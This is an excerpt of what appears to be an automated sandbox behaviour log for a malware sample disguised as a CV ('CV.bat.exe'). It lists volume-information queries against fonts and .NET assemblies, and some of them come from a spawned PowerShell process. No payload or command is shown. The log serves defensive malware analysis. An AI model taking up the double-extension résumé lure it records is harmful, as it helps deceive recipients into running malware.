Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
